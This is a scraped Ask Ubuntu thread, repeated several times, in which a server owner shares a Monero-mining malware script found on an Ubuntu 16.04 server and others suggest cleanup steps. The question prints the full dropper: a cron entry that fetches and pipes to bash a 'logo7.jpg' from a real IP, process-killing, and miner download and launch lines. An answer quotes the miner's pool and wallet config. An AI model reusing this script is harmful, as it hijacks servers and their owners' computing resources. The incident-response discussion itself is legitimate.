suppoie malware removal (script hidden in .jpg)


up vote
3
down vote
favorite
Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?
curl -s http://158.69.133.18:8220/logo7.jpg
#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true &&
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true &&
crontab /tmp/cron || true &&
rm -rf /tmp/cron || true &&
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
16.04 malware
add a comment |Â
up vote
3
down vote
favorite
Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?
curl -s http://158.69.133.18:8220/logo7.jpg
#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true &&
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true &&
crontab /tmp/cron || true &&
rm -rf /tmp/cron || true &&
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
16.04 malware
3
You should restore from a system backup. serverfault.com/q/218005
â dsstorefile1
Apr 19 at 23:24
Its done and system seems clean. I think its related to Drupas security issues.
â R Netz
Apr 19 at 23:55
3
The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
â Thomas Wardâ¦
Apr 24 at 19:20
add a comment |Â
up vote
3
down vote
favorite
up vote
3
down vote
favorite
Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?
curl -s http://158.69.133.18:8220/logo7.jpg
#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true &&
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true &&
crontab /tmp/cron || true &&
rm -rf /tmp/cron || true &&
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
16.04 malware
Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?
curl -s http://158.69.133.18:8220/logo7.jpg
#!/bin/sh
ps aux | grep -vw suppoie | awk 'if($3>40.0) print $2' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true &&
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true &&
crontab /tmp/cron || true &&
rm -rf /tmp/cron || true &&
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
16.04 malware
edited May 3 at 5:54
Melebius
3,75841636
3,75841636
asked Apr 19 at 23:17
R Netz
164
164
3
You should restore from a system backup. serverfault.com/q/218005
â dsstorefile1
Apr 19 at 23:24
Its done and system seems clean. I think its related to Drupas security issues.
â R Netz
Apr 19 at 23:55
3
The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
â Thomas Wardâ¦
Apr 24 at 19:20
add a comment |Â
3
You should restore from a system backup. serverfault.com/q/218005
â dsstorefile1
Apr 19 at 23:24
Its done and system seems clean. I think its related to Drupas security issues.
â R Netz
Apr 19 at 23:55
3
The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
â Thomas Wardâ¦
Apr 24 at 19:20
3
3
You should restore from a system backup. serverfault.com/q/218005
â dsstorefile1
Apr 19 at 23:24
You should restore from a system backup. serverfault.com/q/218005
â dsstorefile1
Apr 19 at 23:24
Its done and system seems clean. I think its related to Drupas security issues.
â R Netz
Apr 19 at 23:55
Its done and system seems clean. I think its related to Drupas security issues.
â R Netz
Apr 19 at 23:55
3
3
The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
â Thomas Wardâ¦
Apr 24 at 19:20
The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
â Thomas Wardâ¦
Apr 24 at 19:20
add a comment |Â
2 Answers
2
active
oldest
votes
up vote
2
down vote
It is in your www-data cron:
sudo crontab -e -u www-data
You'll see something like:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Kill the process then clear it out of /var/tmp
add a comment |Â
up vote
2
down vote
I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.
In my case, it is in /var/spool/cron/crontabs/, also curl something like
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
and the script is in /var/tmp/config.json and suppoie,
which looks like this
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
],
"api":
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
Deleted the line in crontabs, and cleared /var/tmp/, seems worked
add a comment |Â
2 Answers
2
active
oldest
votes
2 Answers
2
active
oldest
votes
active
oldest
votes
active
oldest
votes
up vote
2
down vote
It is in your www-data cron:
sudo crontab -e -u www-data
You'll see something like:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Kill the process then clear it out of /var/tmp
add a comment |Â
up vote
2
down vote
It is in your www-data cron:
sudo crontab -e -u www-data
You'll see something like:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Kill the process then clear it out of /var/tmp
add a comment |Â
up vote
2
down vote
up vote
2
down vote
It is in your www-data cron:
sudo crontab -e -u www-data
You'll see something like:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Kill the process then clear it out of /var/tmp
It is in your www-data cron:
sudo crontab -e -u www-data
You'll see something like:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Kill the process then clear it out of /var/tmp
answered Apr 24 at 19:18
automan
211
211
add a comment |Â
add a comment |Â
up vote
2
down vote
I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.
In my case, it is in /var/spool/cron/crontabs/, also curl something like
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
and the script is in /var/tmp/config.json and suppoie,
which looks like this
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
],
"api":
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
Deleted the line in crontabs, and cleared /var/tmp/, seems worked
add a comment |Â
up vote
2
down vote
I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.
In my case, it is in /var/spool/cron/crontabs/, also curl something like
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
and the script is in /var/tmp/config.json and suppoie,
which looks like this
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
],
"api":
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
Deleted the line in crontabs, and cleared /var/tmp/, seems worked
add a comment |Â
up vote
2
down vote
up vote
2
down vote
I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.
In my case, it is in /var/spool/cron/crontabs/, also curl something like
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
and the script is in /var/tmp/config.json and suppoie,
which looks like this
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
],
"api":
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
Deleted the line in crontabs, and cleared /var/tmp/, seems worked
I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.
In my case, it is in /var/spool/cron/crontabs/, also curl something like
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
and the script is in /var/tmp/config.json and suppoie,
which looks like this
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
],
"api":
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
Deleted the line in crontabs, and cleared /var/tmp/, seems worked
answered Apr 26 at 17:14


Henry Zhang
211
211
add a comment |Â
add a comment |Â
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
var $window = $(window),
onScroll = function(e)
var $elem = $('.new-login-left'),
docViewTop = $window.scrollTop(),
docViewBottom = docViewTop + $window.height(),
elemTop = $elem.offset().top,
elemBottom = elemTop + $elem.height();
if ((docViewTop elemBottom))
StackExchange.using('gps', function() StackExchange.gps.track('embedded_signup_form.view', location: 'question_page' ); );
$window.unbind('scroll', onScroll);
;
$window.on('scroll', onScroll);
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1026545%2fsuppoie-malware-removal-script-hidden-in-jpg%23new-answer', 'question_page');
);
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
var $window = $(window),
onScroll = function(e)
var $elem = $('.new-login-left'),
docViewTop = $window.scrollTop(),
docViewBottom = docViewTop + $window.height(),
elemTop = $elem.offset().top,
elemBottom = elemTop + $elem.height();
if ((docViewTop elemBottom))
StackExchange.using('gps', function() StackExchange.gps.track('embedded_signup_form.view', location: 'question_page' ); );
$window.unbind('scroll', onScroll);
;
$window.on('scroll', onScroll);
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
var $window = $(window),
onScroll = function(e)
var $elem = $('.new-login-left'),
docViewTop = $window.scrollTop(),
docViewBottom = docViewTop + $window.height(),
elemTop = $elem.offset().top,
elemBottom = elemTop + $elem.height();
if ((docViewTop elemBottom))
StackExchange.using('gps', function() StackExchange.gps.track('embedded_signup_form.view', location: 'question_page' ); );
$window.unbind('scroll', onScroll);
;
$window.on('scroll', onScroll);
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
var $window = $(window),
onScroll = function(e)
var $elem = $('.new-login-left'),
docViewTop = $window.scrollTop(),
docViewBottom = docViewTop + $window.height(),
elemTop = $elem.offset().top,
elemBottom = elemTop + $elem.height();
if ((docViewTop elemBottom))
StackExchange.using('gps', function() StackExchange.gps.track('embedded_signup_form.view', location: 'question_page' ); );
$window.unbind('scroll', onScroll);
;
$window.on('scroll', onScroll);
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
3
You should restore from a system backup. serverfault.com/q/218005
â dsstorefile1
Apr 19 at 23:24
Its done and system seems clean. I think its related to Drupas security issues.
â R Netz
Apr 19 at 23:55
3
The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
â Thomas Wardâ¦
Apr 24 at 19:20